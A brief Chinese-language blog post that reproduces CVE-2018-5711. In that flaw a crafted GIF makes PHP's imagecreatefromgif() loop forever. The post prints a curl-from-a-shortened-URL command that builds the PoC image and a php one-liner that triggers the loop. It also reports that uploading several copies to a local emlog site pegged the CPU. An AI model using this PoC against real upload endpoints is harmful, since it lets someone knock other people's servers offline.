Skip to content

复现CVE-2018-5711_一张gif图片让服务器崩溃

字数
102 字
阅读时间
1 分钟
更新日期
1/31/2018

refer:http://www.freebuf.com/vuls/161262.html

js
$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
$ php -r 'imagecreatefromgif("poc.gif");'
  Infinite loop here...

就是生成一张图片,然后找个php程序上传,在我本地测试emlog,在emlog后台上传这张gif,一张还好,后来连续上传了三四张这样的gif,cpu直接飙升到100%

谨以此贴以纪念。附poc图片

poc.zip

撰写